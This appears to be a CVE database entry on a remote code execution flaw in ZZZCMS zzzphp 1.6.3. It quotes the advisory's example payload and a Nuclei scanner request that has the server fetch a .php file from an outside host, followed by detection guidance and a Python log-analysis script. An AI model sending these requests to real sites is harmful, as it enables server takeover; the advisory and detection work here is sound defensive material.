cbcvebase.
CVE-2019-10647
published 2019-03-30

CVE-2019-10647: ZZZCMS zzzphp v1.6.3 allows remote attackers to execute arbitrary PHP code via a .php URL in the plugins/ueditor/php/controller.php?action=catchimage source[]…

Priority: P277 · critical · 9.8 (CVSS 3.0)
CVSS 3.0 vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Tags: ITW · EXPLOIT · VulnCheck KEV
Exploited in the wild
EPSS: 6.59% (93.0th percentile)
ZZZCMS zzzphp v1.6.3 allows remote attackers to execute arbitrary PHP code via a .php URL in the plugins/ueditor/php/controller.php?action=catchimage source[] parameter because of a lack of inc/zzz_file.php restrictions. For example, source%5B%5D=http%3A%2F%2F192.168.0.1%2Ftest.php can be used if the 192.168.0.1 web server sends the contents of a .php file (i.e., it does not interpret a .php file).

Affected

1 range
Vendor        Product   Version range   Fixed in
zzzcms        zzzphp

Detection & IOCs (extracted from sources)

url: /plugins/ueditor/php/controller.php?action=catchimage
path: /plugins/ueditor/php/controller.php
path: /inc/zzz_file.php
path: /upload/
command (Nuclei template request):
  POST /plugins/ueditor/php/controller.php?action=catchimage HTTP/1.1
  Content-Type: application/x-www-form-urlencoded

  source[]=http://{{interactsh-url}}/{{randstr}}.php
  • Detect exploitation attempts by monitoring POST requests to /plugins/ueditor/php/controller.php with action=catchimage and a source[] parameter containing a .php URL
  • A successful exploitation results in a JSON response containing both 'SUCCESS' and 'state' fields with HTTP 200, followed by a GET request to /upload/<filename> to retrieve the dropped PHP file
  • Monitor for out-of-band DNS interactions triggered by the catchimage endpoint fetching attacker-controlled URLs ending in .php — indicative of SSRF/RCE probe
  • The exploit requires the attacker-controlled server to serve PHP code as plain text (not interpreted), so look for HTTP responses with PHP code bodies being fetched by the target server
  • After the catchimage fetch, the uploaded PHP file is stored under /upload/ and can be accessed via GET — monitor for GET requests to /upload/*.php as a sign of post-exploitation access
  • Exploitation requires the attacker-controlled server to serve the .php file as plain text (Content-Type: text/plain or similar) rather than executing it — the vulnerability is in the target's lack of file-type restriction, not the source server's PHP execution
  • The Nuclei template uses a two-step flow: step 1 triggers the catchimage fetch and confirms DNS OOB interaction + SUCCESS response; step 2 GETs the uploaded file — both steps must succeed for confirmed exploitation
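The detection bullets above describe two observable signals on the target: a POST to controller.php?action=catchimage whose source[] value points at a .php URL, and a later GET for a .php file under /upload/. The following is an added example (not code from the page, from ZZZCMS, or from the Nuclei project) that applies both rules to web-server access logs. It assumes a combined log format with one extra quoted field holding the POST body as a reverse proxy or WAF might record it; the log lines are constructed for the example, and the IP and URL values in them are placeholders.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample lines: combined log format plus a trailing quoted field
# that carries the request body (assumed proxy/WAF logging; not real traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [30/Mar/2019:12:00:01 +0000] "POST /plugins/ueditor/php/controller.php?action=catchimage HTTP/1.1" 200 87 "source%5B%5D=http%3A%2F%2F192.168.0.1%2Ftest.php"
10.0.0.5 - - [30/Mar/2019:12:00:02 +0000] "GET /upload/1553947201.php HTTP/1.1" 200 12 "-"
10.0.0.9 - - [30/Mar/2019:12:05:00 +0000] "POST /plugins/ueditor/php/controller.php?action=catchimage HTTP/1.1" 200 87 "source%5B%5D=http%3A%2F%2Fcdn.example%2Fpic.jpg"
10.0.0.9 - - [30/Mar/2019:12:05:01 +0000] "GET /index.php HTTP/1.1" 200 512 "-"
"""

# Assumed log layout: client ip, ident, user, [timestamp], "METHOD target proto",
# status, bytes, "body".
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \d+ '
    r'"(?P<body>[^"]*)"$'
)

CATCHIMAGE_PATH = "/plugins/ueditor/php/controller.php"


def php_urls_in_source(body: str) -> list[str]:
    """Return every source[] value in a form body whose URL path ends in .php.

    parse_qs decodes the percent-encoded key (source%5B%5D) and value once,
    so the check runs on the decoded URL, not the raw body text.
    """
    params = parse_qs(body, keep_blank_values=True)
    return [
        value
        for value in params.get("source[]", [])
        if urlsplit(value).path.lower().endswith(".php")
    ]


def analyze(log_text: str) -> list[dict]:
    """Emit one alert per matching request, in log order.

    Rule 1 (catchimage-php-fetch): POST to the catchimage action carrying a
    .php source[] URL. Rule 2 (upload-php-access): GET of a .php file under
    /upload/, annotated with whether the same client already tripped rule 1,
    which matches the two-step flow the page describes.
    """
    alerts = []
    suspects = set()  # client IPs that already sent a .php catchimage fetch
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that do not fit the assumed layout
        rec = m.groupdict()
        target = urlsplit(rec["target"])
        query = parse_qs(target.query)

        if (rec["method"] == "POST" and target.path == CATCHIMAGE_PATH
                and "catchimage" in query.get("action", [])):
            hits = php_urls_in_source(rec["body"])
            if hits:
                suspects.add(rec["ip"])
                alerts.append({"rule": "catchimage-php-fetch", "ip": rec["ip"],
                               "status": rec["status"], "urls": hits})
        elif (rec["method"] == "GET" and target.path.startswith("/upload/")
                and target.path.lower().endswith(".php")):
            alerts.append({"rule": "upload-php-access", "ip": rec["ip"],
                           "path": target.path,
                           "after_catchimage": rec["ip"] in suspects})
    return alerts


if __name__ == "__main__":
    for alert in analyze(SAMPLE_LOG):
        print(alert)
```

The third sample line is a legitimate-looking catchimage fetch of a .jpg and produces no alert; only the .php fetch and the follow-up GET under /upload/ are reported, and the second alert is marked as coming from a client that already triggered the first rule.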

CVSS provenance

NVD (CVSS v3.0): 9.8 CRITICAL, CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
NVD (CVSS v2.0): 7.5 HIGH, AV:N/AC:L/Au:N/C:P/I:P/A:P
VulnCheck: 9.8 CRITICAL